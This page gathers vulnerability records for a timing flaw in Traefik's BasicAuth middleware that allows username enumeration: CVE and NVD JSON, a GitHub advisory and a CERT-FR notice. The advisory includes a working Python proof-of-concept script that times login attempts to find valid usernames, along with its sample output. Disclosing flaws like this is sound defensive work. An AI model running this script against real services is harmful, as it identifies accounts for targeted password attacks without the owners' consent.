Vulnerability-Lookup

CVE-2026-32595 (GCVE-0-2026-32595)

Vulnerability from cvelistv5 – Published: 2026-03-20 10:08 – Updated: 2026-03-20 15:38

Title

Traefik: BasicAuth Middleware Timing Attack Allows Username Enumeration

Summary

Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.

Severity ?

6.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

CWE

CWE-208 - Observable Timing Discrepancy

Assigner

GitHub_M

References

URL

Tags

	https://github.com/traefik/traefik/security/advis…	x_refsource_CONFIRM
	https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC
	https://github.com/traefik/traefik/releases/tag/v3.6.11	x_refsource_MISC
	https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	traefik	traefik	Affected: < 2.11.41 Affected: >= 3.0.0-beta1, < 3.6.11 Affected: >= 3.7.0-ea.1, < 3.7.0-ea.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32595",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T15:38:09.554987Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T15:38:35.378Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "traefik",
          "vendor": "traefik",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.11.41"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0-beta1, \u003c 3.6.11"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.7.0-ea.1, \u003c 3.7.0-ea.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-208",
              "description": "CWE-208: Observable Timing Discrepancy",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T10:08:41.636Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v2.11.41",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.6.11",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
        }
      ],
      "source": {
        "advisory": "GHSA-g3hg-j4jv-cwfr",
        "discovery": "UNKNOWN"
      },
      "title": "Traefik: BasicAuth Middleware Timing Attack Allows Username Enumeration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32595",
    "datePublished": "2026-03-20T10:08:41.636Z",
    "dateReserved": "2026-03-12T14:54:24.268Z",
    "dateUpdated": "2026-03-20T15:38:35.378Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32595\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T11:18:02.537\",\"lastModified\":\"2026-03-20T13:37:50.737\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.\"},{\"lang\":\"es\",\"value\":\"Traefik es un proxy inverso HTTP y un balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 contienen un middleware BasicAuth que permite la enumeraci\u00f3n de nombres de usuario mediante un ataque de temporizaci\u00f3n. Cuando un nombre de usuario enviado existe, el middleware realiza una comparaci\u00f3n de contrase\u00f1as bcrypt que tarda aproximadamente 166 ms. Cuando el nombre de usuario no existe, la respuesta se devuelve inmediatamente en aproximadamente 0.6 ms. Esta diferencia de temporizaci\u00f3n de aproximadamente 298x es observable a trav\u00e9s de la red y permite a un atacante no autenticado distinguir de forma fiable los nombres de usuario v\u00e1lidos de los no v\u00e1lidos. Este problema est\u00e1 parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-208\"}]}],\"references\":[{\"url\":\"https://github.com/traefik/traefik/releases/tag/v2.11.41\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.6.11\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32595\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T15:38:09.554987Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T15:38:28.829Z\"}}], \"cna\": {\"title\": \"Traefik: BasicAuth Middleware Timing Attack Allows Username Enumeration\", \"source\": {\"advisory\": \"GHSA-g3hg-j4jv-cwfr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.11.41\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0-beta1, \u003c 3.6.11\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.7.0-ea.1, \u003c 3.7.0-ea.2\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.41\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v2.11.41\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.6.11\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.6.11\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-208\", \"description\": \"CWE-208: Observable Timing Discrepancy\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T10:08:41.636Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32595\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T15:38:35.378Z\", \"dateReserved\": \"2026-03-12T14:54:24.268Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T10:08:41.636Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-32595

Vulnerability from fkie_nvd - Published: 2026-03-20 11:18 - Updated: 2026-03-20 13:37

Severity ?

6.3 (Medium) - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v2.11.41
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.6.11
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2
	security-advisories@github.com	https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."
    },
    {
      "lang": "es",
      "value": "Traefik es un proxy inverso HTTP y un balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 contienen un middleware BasicAuth que permite la enumeraci\u00f3n de nombres de usuario mediante un ataque de temporizaci\u00f3n. Cuando un nombre de usuario enviado existe, el middleware realiza una comparaci\u00f3n de contrase\u00f1as bcrypt que tarda aproximadamente 166 ms. Cuando el nombre de usuario no existe, la respuesta se devuelve inmediatamente en aproximadamente 0.6 ms. Esta diferencia de temporizaci\u00f3n de aproximadamente 298x es observable a trav\u00e9s de la red y permite a un atacante no autenticado distinguir de forma fiable los nombres de usuario v\u00e1lidos de los no v\u00e1lidos. Este problema est\u00e1 parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2."
    }
  ],
  "id": "CVE-2026-32595",
  "lastModified": "2026-03-20T13:37:50.737",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "HIGH",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T11:18:02.537",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-208"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-G3HG-J4JV-CWFR

Vulnerability from github – Published: 2026-03-20 15:43 – Updated: 2026-03-20 15:43

Summary

Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration

Details

Summary

There is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.

When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.41
https://github.com/traefik/traefik/releases/tag/v3.6.11
https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary A timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration. ### Details The vulnerability exists in the BasicAuth middleware implementation. When validating credentials: - User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design - User doesn't exist: The system immediately returns authentication failure in ~0.6ms This timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames. Root Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution. Expected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times. ### PoC Environment: - Traefik v3.6.9 - k3s v1.34.5 Configuration:

apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: basicauth
  namespace: traefik-poc
spec:
  basicAuth:
    secret: basic-auth-secret
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: test-basicauth
  annotations:
    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd
spec:
  ingressClassName: traefik
  rules:
    - http:
        paths:
          - path: /protected
            pathType: Prefix
            backend:
              service:
                name: whoami
                port:
                  number: 80

PoC Script:

#!/usr/bin/env python3
import requests
import time
import statistics
import sys
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:30080/protected"
TEST_USERS = ["admin", "root", "test", "nonexistent12345"]
SAMPLES = 20
def measure_time(username, password="wrongpassword"):
    times = []
    for _ in range(SAMPLES):
        start = time.perf_counter()
        requests.get(TARGET, auth=(username, password), timeout=5)
        elapsed = time.perf_counter() - start
        times.append(elapsed)
    return statistics.median(times)
print(f"Target: {TARGET}")
print(f"Samples per user: {SAMPLES}\n")
for user in TEST_USERS:
    median = measure_time(user)
    if median > 0.05:  # bcrypt threshold
        status = "[+] EXISTS (slow - bcrypt verification)"
    else:
        status = "[-] NOT FOUND (fast - immediate return)"
    print(f"{status}: {user:20s} | median={median:.4f}s")

Execution Results:

Target: http://10.10.10.7:30080/protected
Samples per user: 20

[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s
[-] NOT FOUND (fast - immediate return): root          | median=0.0006s
[-] NOT FOUND (fast - immediate return): test          | median=0.0006s
[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s

Timing difference ratio: 298.0x

### Impact - **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208) - **Impact:** - Attackers can enumerate valid usernames without authentication - Enables targeted password brute-force attacks against confirmed accounts - Exposes information about system user structure - **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires: - BasicAuth middleware enabled - Attacker able to make requests to protected endpoints - Network access to measure response times - **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times - **Privileges Required:** None - **User Interaction:** None

Severity ?

6.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.11.40"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.41"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.10"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.0-ea.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T15:43:13Z",
    "nvd_published_at": "2026-03-20T11:18:02Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThere is a potential vulnerability in Traefik\u0027s BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nA timing attack vulnerability exists in Traefik\u0027s BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn\u0027t exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt\u0027s design\n- User doesn\u0027t exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n  name: basicauth\n  namespace: traefik-poc\nspec:\n  basicAuth:\n    secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n  name: test-basicauth\n  annotations:\n    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n  ingressClassName: traefik\n  rules:\n    - http:\n        paths:\n          - path: /protected\n            pathType: Prefix\n            backend:\n              service:\n                name: whoami\n                port:\n                  number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) \u003e 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n    times = []\n    for _ in range(SAMPLES):\n        start = time.perf_counter()\n        requests.get(TARGET, auth=(username, password), timeout=5)\n        elapsed = time.perf_counter() - start\n        times.append(elapsed)\n    return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n    median = measure_time(user)\n    if median \u003e 0.05:  # bcrypt threshold\n        status = \"[+] EXISTS (slow - bcrypt verification)\"\n    else:\n        status = \"[-] NOT FOUND (fast - immediate return)\"\n    print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n  - Attackers can enumerate valid usernames without authentication\n  - Enables targeted password brute-force attacks against confirmed accounts\n  - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik\u0027s BasicAuth middleware are affected. The vulnerability requires:\n  - BasicAuth middleware enabled\n  - Attacker able to make requests to protected endpoints\n  - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n\u003c/details\u003e\n\n---",
  "id": "GHSA-g3hg-j4jv-cwfr",
  "modified": "2026-03-20T15:43:14Z",
  "published": "2026-03-20T15:43:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32595"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration"
}

CERTFR-2026-AVI-0333

Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20

De multiples vulnérabilités ont été découvertes dans Traefik. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

Solutions

